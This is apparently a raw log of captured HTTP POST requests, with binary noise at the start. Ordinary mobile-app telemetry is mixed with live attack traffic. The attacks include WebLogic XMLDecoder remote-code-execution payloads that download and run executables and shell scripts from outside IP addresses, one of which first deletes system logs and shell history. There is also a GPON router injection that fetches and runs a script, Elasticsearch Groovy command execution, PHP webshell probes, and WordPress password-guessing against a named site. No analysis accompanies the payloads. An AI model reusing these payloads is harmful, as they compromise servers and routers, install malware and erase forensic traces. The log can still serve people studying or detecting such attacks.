ãΩï=ã1 Ü˚¸äÈÉÇ,K˛Ç)Sí.˝é¸uw‹nvÊÚÔ„π6MÿcÇ;I6<ºØ^ü∑π›óÌ2(`h"LñìƒÈ3zƒ•›Oeõµfi€m{Y€ÌÙR˜öñykÎ∂ºÌ•g]ügÌ¡G©≈VkºóæÏ˝”≠≠oÁm˛u==]÷”Z_óÛıiº1w±U<àHVEPk*êzŒA5fïe˝˝~g6qπ\k;œ?æM¸˝Á◊˜∆ΩÕ¸eúOÁø(x"ì8$qSêƒ9fP°ÇB$2–òº…≈d€√√2Lí¡É)P:"ÖRXÄ;[à∂*tgµ4√ï>@1¥óÿ≠5c|l–(X‡¨B‘!≥ l≥ß\¶pìÒˇ≈Qÿ§u•∏ÔÖÊÊAŸF»ô { °©}ò¬ÔéItÙv8`cV"∞€Ö¨‡ã‘nc¯0EúåM6$6S0vü—8∏;äãEÁ°ÊÍ$÷Z=ûQÉbƒ¨OV¶ì2¸fl}'`ä#i-d™°Ö`∫ˆˆä!&s¥£:ïR«á \ŸC~fiªm≈çò˙WG˝O“·µˆ
0
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
POST http://hoodrunner.kiloo.com/hr_dailyquests2.php HTTP/1.1
X-Unity-Version: 4.6.5f1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: hoodrunner.kiloo.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 13
key=WVLP874WV
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Åô¶F&Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î¥Ò2Y›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 380
Cache-Control: no-cache
FPBckNvJba2ibQwdo+ddPvC+pWM2Y7507OhNhApNnjdPncaBfQCpeT9qY88NkHrVaVwGlCMY2j7BZtJnneoijoEsUJUdwHLb1p9LW2irbCwGCdXRljqEDwERImMIz/9bpvQPuafYylB8dTVIxpM3b6MPn6tU+ryq3/8+qlKfDInW3JL7ry4f8Uz6uwhI4dmpXnf2plYp5Mol3AEMFrCUCwEk1G5zUSt5IL7Pg2NvB6rV9fBDF3Q1laiD28XZ2xSZkkdarSNLX06kRFOAkwDyroZzjnuPg3cLKF6wwmKTqbD+pfwbsRUzVk/59HsFKaIK7Pk4c1l1lFMdRb9Bfgti2ZblKe3zEkyVHAh3d3RB1EtC8A81a//efnbPzVC6
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
h=die((string)(111111111*9));
POST //wls-wsat/CoordinatorPortType HTTP/1.1
Content-Type: text/xml
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html）
Host: x.x.x.x:7001
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-Length: 726
<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<void class="java.lang.Thread" method="currentThread">
<void method="getCurrentWork">
<void method="getResponse">
<void method="getWriter"><void method="write"><string>xmldecoder_vul_test</string></void></void>
</void>
</void>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1037
Content-Type: multipart/form-data; boundary=wFtbJQIOJmfUFTaEEuQw6Kk27oUI_FDQs
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--wFtbJQIOJmfUFTaEEuQw6Kk27oUI_FDQs
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--wFtbJQIOJmfUFTaEEuQw6Kk27oUI_FDQs
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
501226
--wFtbJQIOJmfUFTaEEuQw6Kk27oUI_FDQs
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
db37450440085bdb3b684cae749a4e5c
--wFtbJQIOJmfUFTaEEuQw6Kk27oUI_FDQs
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--wFtbJQIOJmfUFTaEEuQw6Kk27oUI_FDQs
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--wFtbJQIOJmfUFTaEEuQw6Kk27oUI_FDQs--
POST /wls-wsat/RegistrationPortTypeRPC11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1306
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile(&apos;http://198.50.179.109:8020/taskhostxz.exe&apos;,&apos;C:/Windows/temp/taskhostxz.exe&apos;);Start-Process &apos;C:/Windows/temp/taskhostxz.exe&apos;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST http://batsavcdn.ksmobile.net/bsi HTTP/1.1
Connection: close
User-Agent: CMTalkerSDK.0.0.1
Content-Type: multipart/form-data; boundary=3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f
Accept-Language: in_ID
Host: batsavcdn.ksmobile.net
Accept-Encoding: gzip
Transfer-Encoding: chunked
POST //_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_131
Host: x.x.x.x:9200
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-Length: 125
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.File\").listRoots()","lang": "groovy"}}}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 428
Cache-Control: no-cache
RPQLlNycZnWVvJWyrnFibUMh8Rubv2LuGMse4UcRCSRIivImijaKO9J2fFZZjHijlRAEUV+cJIiv6Wvit00lBanwu2HWgHa5cAjqMGqVls8sdhhFIQsYOd74NEI0QjM2IHqVGDqMsW3JKotA4/o494WcGpf5C8cSyFld2foogwVM87eg95hWshZpOAZy6XtZaEbVmOVqEn0wGxIsuzBiJH2jiyeQmkdCCdXCbeS89f7SqlKQeaU9NZluXjJmJgiBlJpYLa17VTXSO5ngEsSXilmKdbsvfjESAF8s5K8c4G3UjUF2WUDaPpb7y21lKSeFCCY/03ZECMzzADc/J4TiOxq2yvE1tsrM64t4rqc/b4orEm3eYpU2mIxmBaU39r+uWqzBD1zaAO+AjnxDVPgGOqX35h9P49kbyjIZkw8KF34=
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded;charset=utf-8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36
Host: x.x.x.x:8080
Content-Length: 0
Connection: Keep-Alive
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 404
Cache-Control: no-cache
RPZcyImdbEC8Js+Oq84pwYIZ7aH9MJZS10vXFUQ/mxDafv6qf3GmLV8iRVurcgclljjhNyGIYvBsdqZQcMYs1VA0r+CuqKH1rrOt4yhWqTUDXkiQacLZQOVsft6RDoFkHNQUe8tUUXuyvsvm+Ih8tQfPPNqJX4veOqei+YjYMgq/iK6oqRsoYo/dfg8jCi7jraPvgGW7CnTCFvcfSqBhxStN/8Yg4yIlrRTCt++l3FYzHEGFxO3N5OGFlpGknH4xtSg0GyeB3JG9GgKIVSLfxkjcH26HoaNsUubyf1aSAaUUM1EVxq0q3uD/vzMHhh1HTSSYLgTXZtLEwa29FN6GuAidn8oGJyQOGMuK1487SY8IZ9nT19ZZHbOjBXqWmz3gHADZk8JcYAE+teeGp9w=
POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
leng=die((string)(111111111*9));
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 25
Cache-Control: no-cache
log=admin&pwd=admin444444
POST http://u.ucfly.com:80/ HTTP/1.1
Content-Type: text/xml
Accept: application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;q=0.6,/139
User-Agent: UCWEB/2.0 (Linux; U; Opera Mini/7.1.32052/30.3697; id; MI 4LTE Build/KTU84P) U2/1.0.0 UCMini/10.9.0.946 (SpeedMode; Android 4.4.4; MI 4LTE Build/KTU84P) Mobile
X-UCBrowser-Device-UA: Mozilla/5.0 (Linux; U; Android 4.4.4; id; MI_4LTE Build/KTU84P) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
Content-Length: 469
Host: u.ucfly.com:80
Connection: Keep-Alive
<assign data="0tiawOjp+Yed19SRsLmnksOI0IKwt6ee3Yvdhqy4osXXiYiH5ay30YvLmtru4KqF34nHiq++uZ7aj8uT8eL204jWm968rPbJisuG2uWst9Kd3JvS5uv509ObpPqhutvzq5vJ3+D94/id3JvF5PyqhcyZm9bg/eTOidfUkefv+9SLm8ne3uz+w9Ob2oa0rLfKsdqBjqPp+MiJ1Yye8eL23syZmcHls7Xyrfub3Pb98tXMmYXS7+mqhYfdy5Pj+u7Xi4TL9Must8WD1o3WvKzW976bycP36+WazIrHgqOu+vie34DXvKymlNebyd7e7OTCn4TLgra+pJbeiNyRoePIw4CEy4K4v6ae3oDagbW7upCIgYuEsu+nhc7XjMf19+fC05uH1vWst9Ka3YDXvKzBlKTBs8HLyMbSmf2o/vXpwYi56rCE7ri1h4/QjY6jrLeI0M6Z"/>
POST http://check.proxyradar.com/azenv.php?auth=152967427803&a=PSCMN&i=3489034269&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://check.proxyradar.com/azenv.php?auth=149407325963&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgA7AEkARQBYACAAJABXAEMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwADEALgAyADAAMAAuADQANQAuADcAOAAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å∂ØmÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îäY›∆√«∆fl
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 392
Cache-Control: no-cache
Rqdax4zPbVquV02ZdJfYdqRNHKBxCx6N9WQK0ZlzrhhzppPuFRQ5otfA8L4ECinTx3PW5L7+8pvRALSC0n3ep/sUEawG7OnlTnBn2SMp+QGLKeiUOK8x8xr7jNyuxJzptF/BzybdWhuiNMm3ErLFdXNsEkNS4be1N7JR9qgoK35oHYuE8vocBIti2VWNY4Ua64gewz296ctSKHjHMo/8uXSHTpqRozByh4RkN5XH98LnUzfrXt5IPZibgJC2ITovluwuZN8hc9cR+QCbz7rqtPF4tN0xD368L3e+pTRNj5yz5KDZMmGz43P9Gc+OqRYiSuQ52VI4gf2My5ak0ASs2D1pf1gBJYCafaQl6kslf/7UZeWdxmfhdpaqdQc6XcghhuQ/PA==
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; ASJB; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 388
Cache-Control: no-cache
A1KwzyZEVgtLIycxm6OWduJhJnvsJeFowrcQ8IDdb4sh+JVhnCTVmtOXSP4LN+KWnMcQnzL+nXhRJNz9xo/MI5B4nZgnzd40sx4cS02bPWl0eiNxscjn4O02vgxHKKuOMkEyb+ataIYGm2qeVtZbMn1HkRNCNTK8SQ20e25OVYB/xVca7pT/l2JQrDNiFNaVOA2coImo0rSamjlsCVdu4nEoShgaPQTtHCKhS6Bq+tKef1tec+FyGcG35R80NW+T6J+LJYrBpx7iBRjcUi51plZ60Tu6nrqs4/hpBaU6oiAfI2rSSHq25jSFWv51KWOnrhec4O7Pd22y2SCZ/+WwDAYRUN3b7ZDAEQasAw8vLG568P2rDyYB0iWZPDbiv9i1WU4=
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 23
Cache-Control: no-cache
log=admin&pwd=333333333
POST /command.php HTTP/1.0
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
Content-Type: application/x-www-form-urlencoded
Content-Length: 208
cmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20%65%63%68%6F%20%2D%6E%65%20%5C%5C%78%33%36%31%30%63%6B%65%72%20%3E%20%36%31%30%63%6B%65%72%2E%74%78%74%20%26%26%20%63%61%74%20%36%31%30%63%6B%65%72%2E%74%78%74
POST /command.php HTTP/1.1
Accept: */*
Host: x.x.x.x
Content-Type: application/x-www-form-urlencoded
User-Agent: Wget(linux)
Content-Length: 208
cmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20%65%63%68%6F%20%2D%6E%65%20%5C%5C%78%33%36%31%30%63%6B%65%72%20%3E%20%36%31%30%63%6B%65%72%2E%74%78%74%20%26%26%20%63%61%74%20%36%31%30%63%6B%65%72%2E%74%78%74
POST http://www.zhangyuntao.com.cn/IVUPro/todayScore.php HTTP/1.1
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: www.zhangyuntao.com.cn
Connection: Keep-Alive
Content-Length: 206
act=-1&data=%7B%22appInfo%22%3A+%22Block+Puzzle+Jewel_com.differencetenderwhite.skirt_18%22%2C+%22rankId%22%3A+%22gem30%22%2C+%22score%22%3A+180%2C+%22uid%22%3A+%22ba7758bb-1039-46c5-888f-950f5ff4b1b8%22%7D
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 436
Cache-Control: no-cache
Q6cIyYicZRWNQPL3EJY0KIDf0UGiORTzglqWlnZqwPQ7RnxoxLR9PKSwFCQ+xIWOmN3/wDjsS8pGHKhdMbbDA+VzG0UXdHFbDMPgPwtq8ZjMx9oFSZexHOeNMDVlzHzNNsQOBOLdL7cbPqpZsr0eiBM+o1+nNVg9+yuHjGnGPbvs5ePFz02Fd82Z/qemePd6HtWwq1Wyd4s2/7GzpLfTZ3qzCnp5L2Z+Cm6tOO0nYLCwPHRdkgE4Q6vGMaVxQDgQm7/UXXOBv6D31zbQRit4vGAKE16lnPOs/zTdi2p0kAU/kOwWUMrPfY3V+kAfc8tAKCOTIMSgnC7/Z9aUe3wXFx57+KJwtyQQ3Pu5dYK70nKpYrNOSy+WcNO5dK7LoqKHshOoGxT2ypG8/vFTm0ALukPZgkFBherRAn5yniDcgwVDfmn84A==
POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1673
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>unset; rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; unset HISTFILE; unset HISTSAVE; unset HISTLOG; history -n; unset WATCH; export HISTFILE=/dev/null; export HISTFILE=/dev/null; wget http://93.174.93.149/logo8.sh -O /tmp/logo8.sh; curl -o /tmp/logo8.sh http://93.174.93.149/logo8.sh; lwp-download http://93.174.93.149/logo8.sh /tmp/logo8.sh; bash /tmp/logo8.sh; rm -rf /tmp/logo8.sh; history -c</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1079
Content-Type: multipart/form-data; boundary=3M7FW3NPeNlOJS5nbM6FgBPR0TPbKN0VSPLdoxVk
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--3M7FW3NPeNlOJS5nbM6FgBPR0TPbKN0VSPLdoxVk
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--3M7FW3NPeNlOJS5nbM6FgBPR0TPbKN0VSPLdoxVk
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
168422
--3M7FW3NPeNlOJS5nbM6FgBPR0TPbKN0VSPLdoxVk
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
da32c6169abd6c7efaab37f7aa590487
--3M7FW3NPeNlOJS5nbM6FgBPR0TPbKN0VSPLdoxVk
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--3M7FW3NPeNlOJS5nbM6FgBPR0TPbKN0VSPLdoxVk
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--3M7FW3NPeNlOJS5nbM6FgBPR0TPbKN0VSPLdoxVk--
POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]
POST http://gj.applog.uc.cn/collect?zip=gzip&pf=android&pn=com.uc.browser.en&ve=10.9.0&vc=104&sdk_ve=3.0.10&sdk_vc=212&sf=EVCoreProductMediation&app=0652abada25c&uuid=15bf5ee0f45-af8795dc3d31775f&vno=1495542390494&chk=21a23467 HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Connection: keep-alive
Host: gj.applog.uc.cn
Transfer-Encoding: chunked
Content-Type: application/octet-stream
POST http://check.proxyradar.com/azenv.php?auth=149169258913&a=PSCMN&i=1082764042&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://api.vungle.com/api/v4/sessionStart HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 106
{"start":1495017089026,"pubAppId":"5811c733a1e0773e1a000028","ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache
log=jamesatchue&pwd=buster
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Åq÷ ÍÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îüÑ$Y›∆√«∆fl
POST http://appinfocdn.ksmobile.net/cpui HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: appinfocdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 58
:´gÜ—ó;eò@YMp<%iÅ˝Yª?ffA0#]UAIebØæo«»u2fiyÄ˝…0ŸπLNU]9
POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
axa=die('Hello, Peppa!'.(string)(111111111*9));
POST http://best-proxies.ru/azenv.php?rand=e4a0f62a0175e0458a09886b06e018fb HTTP/1.1
Cookie: testCookie=true
Host: best-proxies.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: http://best-proxies.ru/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://www.zhangyuntao.com.cn/IVUPro/todayScore.php HTTP/1.1
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: www.zhangyuntao.com.cn
Connection: Keep-Alive
Content-Length: 206
act=-1&data=%7B%22appInfo%22%3A+%22Block+Puzzle+Jewel_com.differencetenderwhite.skirt_18%22%2C+%22rankId%22%3A+%22gem30%22%2C+%22score%22%3A+556%2C+%22uid%22%3A+%22ba7758bb-1039-46c5-888f-950f5ff4b1b8%22%7D
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å∏ÏÕËÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î;;Y›∆√«∆fl
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 24
Cache-Control: no-cache
log=admin&pwd=admin99999
POST http://t12.proxy-checks.com/favicon.ico HTTP/1.1
Host: t12.proxy-checks.com
